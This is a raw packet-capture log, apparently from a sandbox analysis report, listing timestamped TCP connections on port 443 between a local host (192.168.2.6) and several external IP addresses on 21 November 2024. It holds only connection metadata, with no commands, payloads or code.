                                                                                                                                                                                                            Nov 21, 2024 15:17:23.477864981 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.477893114 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.478037119 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.478051901 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.478115082 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.498383045 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.498406887 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.498469114 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.498488903 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.498553038 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.498553038 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.502697945 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.502799034 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.502811909 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.502829075 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.502854109 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.502957106 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.504563093 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.504589081 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.504606962 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.504641056 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.614648104 CET4434974720.234.120.54192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.614722013 CET49747443192.168.2.620.234.120.54
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.615194082 CET49747443192.168.2.620.234.120.54
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.615199089 CET4434974720.234.120.54192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.615510941 CET49747443192.168.2.620.234.120.54
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.615516901 CET4434974720.234.120.54192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.016320944 CET4434974720.234.120.54192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.016432047 CET4434974720.234.120.54192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.016562939 CET49747443192.168.2.620.234.120.54
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.030147076 CET4434974913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.068881989 CET4434975213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.077688932 CET49749443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.093485117 CET49749443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.093502045 CET4434974913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.094067097 CET49749443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.094073057 CET4434974913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.094476938 CET49752443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.094499111 CET4434975213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.094891071 CET49752443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.094896078 CET4434975213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.096700907 CET49747443192.168.2.620.234.120.54
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.096730947 CET4434974720.234.120.54192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.112091064 CET4434975013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.116977930 CET4434975113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.123403072 CET49750443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.123464108 CET4434975013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.132281065 CET49750443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.132294893 CET4434975013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.139705896 CET44349748188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.139799118 CET44349748188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.140121937 CET49748443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.140599966 CET49751443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.140613079 CET4434975113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.153367043 CET49751443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.153376102 CET4434975113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.168488979 CET4434975313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.186950922 CET49753443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.186989069 CET4434975313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.190496922 CET49753443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.190504074 CET4434975313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.229103088 CET49748443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.229134083 CET44349748188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.475385904 CET4434974913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.475471973 CET4434974913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.475533009 CET49749443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.475931883 CET49749443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.475951910 CET4434974913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.475966930 CET49749443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.475971937 CET4434974913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.478985071 CET49756443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.479032993 CET4434975613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.479093075 CET49756443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.479381084 CET49756443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.479396105 CET4434975613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.507863998 CET4434975213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.507930994 CET4434975213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.508697987 CET49752443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.509273052 CET49752443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.509289980 CET4434975213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.509334087 CET49752443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.509341955 CET4434975213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.513372898 CET49757443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.513406992 CET4434975713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.513475895 CET49757443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.513592958 CET49757443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.513608932 CET4434975713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.564017057 CET4434975113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.564081907 CET4434975113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.565212965 CET49751443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.565488100 CET49751443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.565505028 CET4434975113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.565531015 CET49751443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.565536976 CET4434975113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.567303896 CET4434975013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.567398071 CET4434975013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.567523956 CET49750443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.568375111 CET49758443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.568403006 CET4434975813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.568505049 CET49758443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.568666935 CET49750443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.568666935 CET49750443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.568680048 CET49758443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.568687916 CET4434975013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.568700075 CET4434975813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.568706036 CET4434975013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.570812941 CET49759443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.570838928 CET4434975913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.571137905 CET49759443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.571330070 CET49759443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.571341038 CET4434975913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.605547905 CET4434975313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.605627060 CET4434975313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.605932951 CET49753443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.606082916 CET49753443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.606101036 CET4434975313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.606113911 CET49753443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.606118917 CET4434975313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.608411074 CET49760443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.608448982 CET4434976013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.608519077 CET49760443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.608896017 CET49760443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.608920097 CET4434976013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.933366060 CET4434975552.149.20.212192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.933423042 CET49755443192.168.2.652.149.20.212
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.937354088 CET49755443192.168.2.652.149.20.212
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.937365055 CET4434975552.149.20.212192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.937726974 CET4434975552.149.20.212192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.977360964 CET49761443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.977412939 CET44349761188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.977478981 CET49761443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.977819920 CET49761443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.977838993 CET44349761188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:24.983854055 CET49755443192.168.2.652.149.20.212
                                                                                                                                                                                                            Nov 21, 2024 15:17:25.029174089 CET49755443192.168.2.652.149.20.212
                                                                                                                                                                                                            Nov 21, 2024 15:17:25.075334072 CET4434975552.149.20.212192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:25.671768904 CET4434975552.149.20.212192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:25.671796083 CET4434975552.149.20.212192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:25.671807051 CET4434975552.149.20.212192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:25.671823025 CET4434975552.149.20.212192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:25.671858072 CET4434975552.149.20.212192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:25.672080040 CET49755443192.168.2.652.149.20.212
                                                                                                                                                                                                            Nov 21, 2024 15:17:25.672115088 CET4434975552.149.20.212192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:25.672254086 CET49755443192.168.2.652.149.20.212
                                                                                                                                                                                                            Nov 21, 2024 15:17:25.699338913 CET4434975552.149.20.212192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:25.699419975 CET49755443192.168.2.652.149.20.212
                                                                                                                                                                                                            Nov 21, 2024 15:17:25.699455023 CET4434975552.149.20.212192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:25.699471951 CET4434975552.149.20.212192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:25.699516058 CET49755443192.168.2.652.149.20.212
                                                                                                                                                                                                            Nov 21, 2024 15:17:25.699681997 CET49755443192.168.2.652.149.20.212
                                                                                                                                                                                                            Nov 21, 2024 15:17:25.699698925 CET4434975552.149.20.212192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:25.699711084 CET49755443192.168.2.652.149.20.212
                                                                                                                                                                                                            Nov 21, 2024 15:17:25.699717045 CET4434975552.149.20.212192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.229784966 CET4434975713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.231487036 CET49757443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.231513977 CET4434975713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.231965065 CET49757443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.231970072 CET4434975713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.252274036 CET44349761188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.252394915 CET49761443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.254271030 CET49761443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.254286051 CET44349761188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.254715919 CET44349761188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.256439924 CET49761443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.257347107 CET49761443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.257389069 CET44349761188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.257493019 CET49761443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.257533073 CET44349761188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.257658958 CET49761443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.257688046 CET44349761188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.257868052 CET49761443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.257894993 CET44349761188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.259289026 CET49761443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.259325027 CET44349761188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.259507895 CET49761443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.259537935 CET44349761188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.259547949 CET49761443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.259715080 CET49761443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.259733915 CET49761443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.274818897 CET4434975613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.275482893 CET49756443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.275521040 CET4434975613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.276180983 CET49756443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.276186943 CET4434975613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.285161018 CET4434975813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.285723925 CET49758443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.285751104 CET4434975813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.286159992 CET49758443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.286171913 CET4434975813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.307329893 CET44349761188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.307584047 CET49761443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.307640076 CET49761443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.307657003 CET49761443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.333113909 CET4434976013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.333667040 CET49760443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.333698988 CET4434976013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.334181070 CET49760443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.334187984 CET4434976013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.355329037 CET44349761188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.357614040 CET49761443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.357667923 CET49761443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.357692003 CET49761443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.399333954 CET44349761188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.399420977 CET49761443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.420520067 CET4434975913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.421017885 CET49759443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.421050072 CET4434975913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.421777964 CET49759443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.421788931 CET4434975913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.443331003 CET44349761188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.500417948 CET44349761188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.673681021 CET4434975713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.673769951 CET4434975713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.673911095 CET49757443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.674041986 CET49757443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.674067020 CET4434975713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.674088001 CET49757443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.674093962 CET4434975713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.677386999 CET49762443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.677438021 CET4434976213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.677637100 CET49762443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.677822113 CET49762443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.677834988 CET4434976213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.721966982 CET4434975613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.722038031 CET4434975613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.723495007 CET49756443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.723531961 CET49756443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.723553896 CET4434975613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.723568916 CET49756443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.723576069 CET4434975613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.723651886 CET4434975813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.723726988 CET4434975813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.723774910 CET49758443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.723928928 CET49758443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.723934889 CET4434975813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.723946095 CET49758443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.723951101 CET4434975813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.726349115 CET49763443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.726398945 CET4434976313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.726506948 CET49763443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.726696014 CET49763443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.726707935 CET4434976313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.726722002 CET49764443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.726761103 CET4434976413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.729449987 CET49764443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.729598045 CET49764443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.729609966 CET4434976413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.771341085 CET4434976013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.771424055 CET4434976013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.771553993 CET49760443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.771691084 CET49760443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.771707058 CET4434976013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.771717072 CET49760443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.771723986 CET4434976013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.774794102 CET49765443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.774889946 CET4434976513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.774992943 CET49765443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.775243998 CET49765443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.775281906 CET4434976513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.882929087 CET4434975913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.883014917 CET4434975913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.883084059 CET49759443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.883332014 CET49759443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.883353949 CET4434975913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.883364916 CET49759443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.883371115 CET4434975913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.886883020 CET49766443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.886951923 CET4434976613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.887118101 CET49766443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.887342930 CET49766443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:26.887376070 CET4434976613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:28.466730118 CET4434976213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:28.467753887 CET49762443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:28.467786074 CET4434976213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:28.468456984 CET49762443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:28.468465090 CET4434976213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:28.544989109 CET4434976413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:28.545505047 CET49764443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:28.545533895 CET4434976413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:28.546071053 CET49764443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:28.546082973 CET4434976413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:28.594084978 CET4434976313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:28.598938942 CET49763443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:28.598975897 CET4434976313.107.246.45192.168.2.6
